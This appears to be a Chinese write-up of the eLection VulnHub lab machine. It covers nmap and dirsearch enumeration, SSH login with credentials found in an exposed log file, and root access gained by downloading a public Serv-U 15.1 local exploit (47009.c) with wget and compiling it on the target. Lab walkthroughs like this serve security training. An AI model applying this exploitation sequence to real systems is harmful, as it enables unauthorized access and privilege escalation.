当前位置: 首页 > news >正文

【OSCP】- eLection 靶机学习

目录

  • 0. 靶场信息
  • 1. 靶机扫描/服务探测
  • 2. 80端口
  • 3. 22端口
  • 4. 提权

0. 靶场信息


Level: Intermediate

Community Rating: Intermediate

Number of Flags: 2

OS: Linux

Leverage enumeration and web enumeration techniques to uncover system weaknesses. Apply privilege escalation strategies to gain elevated access. This lab is designed to harness your skills in vulnerability discovery and exploitation.

vulnhub:https://www.vulnhub.com/entry/election-1,503/



1. 靶机扫描/服务探测


目标靶机IP:192.168.194.211

扫描端口: sudo nmap -Pn -sS -T4 -AO -p- 192.168.194.211

# nmap -Pn -sS -T4 -AO 192.168.194.211
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-20 16:06 CST
Warning: 192.168.194.211 giving up on port because retransmission cap hit (6).
Nmap scan report for bogon (192.168.194.211)
Host is up (0.19s latency).
Not shown: 960 closed tcp ports (reset), 38 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/20%OT=22%CT=1%CU=32147%PV=Y%DS=4%DC=T%G=Y%TM=687C
OS:A482%P=x86_64-pc-linux-gnu)SEQ(CI=Z%TS=A)SEQ(TI=Z%CI=Z%TS=A)SEQ(SP=102%G
OS:CD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=10F%TI=Z%CI=Z%TS=D
OS:)SEQ(SP=109%GCD=2%ISR=10D%TI=Z%CI=Z%II=I%TS=C)OPS(O1=M578ST11NW7%O2=M578
OS:ST11NW7%O3=M578NNT11NW7%O4=M578ST11NW7%O5=M578ST11NW7%O6=M578ST11)WIN(W1
OS:=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O
OS:=M578NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1
OS:(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=40%CD=S)Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 8085/tcp)
HOP RTT       ADDRESS
1   ...
2   195.65 ms bogon (192.168.45.254)
3   196.21 ms bogon (192.168.251.1)
4   195.99 ms bogon (192.168.194.211)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 234.39 seconds

开放了22端口(OpenSSH 7.6p1)和80端口(Apache httpd 2.4.29)。



2. 80端口


浏览器访问 80 端口:http://192.168.194.211/

在这里插入图片描述

是一个 Apache 的页面。目录扫描:dirsearch -u 192.168.194.211

在这里插入图片描述

发现几个路径,依次访问看能否发现什么信息:

  • /phpinfo.php:暂时没有什么有用的信息

    在这里插入图片描述

  • /phpmyadmin 和 /phpmyadmin/index.php:管理员的登录页面,可以试试登录。

    在这里插入图片描述

  • /phpmyadmin/doc/html/index.html

    在这里插入图片描述

  • /robots.txt:

    在这里插入图片描述

    这不是一个标准的 robotes.txt 文件内容,所以可能是存在的目录。依次访问这些目录,都是404,只有 election 有返回:http://192.168.194.211/election/

    在这里插入图片描述


再来探测一下http://192.168.194.211/election/的目录:dirsearch -u http://192.168.194.211/election

在这里插入图片描述

我把每个路径都访问了一下:

  • /election/admin/,/election/admin/index.php

    在这里插入图片描述

  • /election/admin/logs/

    在这里插入图片描述

  • /election/data/

    在这里插入图片描述

  • /election/index.php/login/

    在这里插入图片描述

  • /election/js/

    在这里插入图片描述

  • /election/languages

    在这里插入图片描述

  • /election/lib

    在这里插入图片描述

  • /election/media/

    在这里插入图片描述

  • /election/themes/

    在这里插入图片描述


在admin(http://192.168.194.211/election/admin/)的路径下,发现有个测试 admin ID的页面:

在这里插入图片描述


这里尝试了admin,提示还有五次机会。有次数限制,暂时不考虑破解了。

又想到在log路径(http://192.168.194.211/election/admin/logs/)下有个系统日志文件 system.log,访问一下就自动下载了,查看文件内容:

在这里插入图片描述


给出了一个用户名和密码:love: P@$$w0rd@123

再去 http://192.168.194.211/election/admin/ 中尝试,发现还是不行。

想起来前面的的 phpmyadmin 登录页面,来试一下,发现也不是用在这里的。

在这里插入图片描述



3. 22端口


还有个 22 端口的 ssh 服务:ssh love@192.168.194.211

在这里插入图片描述

进入服务器了,进行一波服务器的信息收集,发现了第一个 flag:

在这里插入图片描述



4. 提权


查看权限相关的信息:

在这里插入图片描述

查看端口开放情况:netstat -tuln

在这里插入图片描述

开放了3306端口,结合前面的phpmyadmin,可以考虑去找mysql相关的信息。

在前面的 phpinfo.php 页面可以看到网站的根目录,进入网站目录看看有没有数据库相关的信息:/var/www/html

在这里插入图片描述

找到了数据库的用户名和密码,用这个可以登录到 phpmyadmin 中:

在这里插入图片描述

查看数据库相关的信息,这发现还有一个 root 用户,密码是 toor。所以前面在面对 phpmyadmin 的时候可以尝试弱口令:

在这里插入图片描述

在这里插入图片描述

数据库方面这里没有其他的可用信息了。

再次回到前面在查看权限相关的信息的时候,有个 /usr/local/Serv-U/Serv-U,这是SolarWinds 专有的 FTP 和 MFT 服务器:

在这里插入图片描述


进入这个目录中看一看,发现了版本信息 15.1:

在这里插入图片描述

查找看有没有相关的漏洞可以利用:searchsploit Serv-U 15.1

在这里插入图片描述

这里有两个可以利用的,尝试使用第一个。

先将脚本复制到当前目录下:searchsploit -m 47009.c
查看脚本内容:

在这里插入图片描述


c语言的脚本要先 compile编译,这个文件中也给出了使用方法。

在kali中用python搭建一个简易的服务器,将这个文件上传到靶机。

开启python服务器:python -m http.server 9898

目标主机下载文件:wget http://192.168.45.190:9898/47009.c

在这里插入图片描述

提示没有写入权限,切换到 /tmp 目录下再尝试 wget:

在这里插入图片描述

写入成功,按照这个脚本中说明的使用方法,执行命令:gcc 47009.c -o pe && ./pe

在这里插入图片描述

提权成功。第二个flag在 /root下:

在这里插入图片描述





http://www.lryc.cn/news/610937.html

相关文章:

  • 基于ARM+FPGA光栅数据采集卡设计
  • Electron-updater + Electron-builder + IIS + NSIS + Blockmap 完整增量更新方案
  • GPT-1、GPT-2、GPT-3 的区别和联系
  • 7、Redis队列Stream和单线程及多线程模型
  • 人工智能领域、图欧科技、IMYAI智能助手2025年4月更新月报
  • 【RK3576】【Android14】Uboot下fastboot命令支持
  • 创维智能融合终端DT741_移动版_S905L3芯片_安卓9_线刷固件包
  • CTF-XXE 漏洞解题思路总结
  • 测试开发:Python+Django实现接口测试工具
  • Python-初学openCV——图像预处理(七)——亮度变换、形态学变换
  • ThingsKit Edge是什么?
  • 从零实现富文本编辑器#6-浏览器选区与编辑器选区模型同步
  • 数据结构 | 树的秘密
  • 在Linux上部署tomcat、nginx
  • CRT调试堆检测:从原理到实战的资源泄漏排查指南
  • Apifox使用mock模仿后端返回数据
  • JumpServer 堡垒机全流程搭建指南及常见问题解决方案
  • Redis存储string里面embstr和raw格式区别
  • 【Linux】特效爆满的Vim的配置方法 and make/Makefile原理
  • 【01】OpenCV C++实战篇——基于多项式插值的亚像素边缘定位算法
  • Occ3D: A Large-Scale 3D Occupancy Prediction Benchmark for Autonomous Driving
  • Python爬虫实战:研究weiboSpider技术,构建新浪微博数据采集系统
  • 多层Model更新多层ListView
  • RHCA05--进程管理与文件系统管理
  • 数据结构(01)—— 数据结构的基本概念
  • 应用科普 | 漫谈6G通信的未来
  • 【技术教程】如何将 ONLYOFFICE 文档连接到 Confluence
  • 坚鹏:AI智能体软件是知行学成为AI智能体创新应用引领者的抓手
  • Fiddler 中文版实战指南,如何构建高效的 API 调试工作流?
  • Z20K118库中寄存器及其库函数封装-ADC库